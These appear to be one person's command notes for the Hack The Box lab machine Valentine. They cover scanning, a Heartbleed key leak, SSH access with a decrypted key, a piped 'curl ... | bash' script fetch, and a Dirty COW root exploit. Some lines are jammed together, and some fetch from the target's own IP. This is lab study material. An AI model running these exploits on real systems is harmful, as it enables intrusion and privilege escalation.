echo "10.129.1.190 valentine.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.1.190 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA valentine 10.129.1.190

nmap -sU -O -p- -oA valentine-udp 10.129.1.190

Pasted image 20210304210041.png

nikto -h 10.129.1.190:80 ![[Pasted image 20210304210150.png]]

gobuster dir -k -u http://valentine.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210304210355.png

Pasted image 20210304210405.png

https://0x1.gitlab.io/code/CyberChef/

wget https://10.129.1.190/dev/hype_key --no-check-certificate
cat hype_key | xxd -r -p
cat hype_key | xxd -r -p > encrypted_hype_key openssl rsa -in encrypted_hype_key -out decrypted_hype_key ssh -i decrypted_hype_key hype@10.129.1.190 chmod 400 encrypted_hype_key

Pasted image 20210304210558.png

git clone https://gist.github.com/10174134.git

python heartbleed.py -p 443 -n 10 10.129.1.190

Pasted image 20210304210624.png

Pasted image 20210304210634.png

Pasted image 20210304210655.png

python -m http.server 8888

curl http://10.129.1.190:8888/LinEnum.sh | bash

Pasted image 20210304210913.png

searchsploit dirty
searchsploit -m 40839
cd /dev/shm && wget http://10.129.1.190:8888/40839.c

git clone https://gist.github.com/e9d4ff65d703a9084e85fa9df083c679.git
https://github.com/FireFart/dirtycow/blob/master/dirty.c

Pasted image 20210304210955.png

hype@Valentine:/dev/shm$ gcc -pthread dc.c -o c -lcrypt
hype@Valentine:/dev/shm$ chmod +x c hype@Valentine:/dev/shm$ ./c

Pasted image 20210304211019.png

Pasted image 20210304211025.png

hype@Valentine:/dev/shm$ su firefart
Password test

boxes

copyright©2022 Cu3rv0x all rights reserved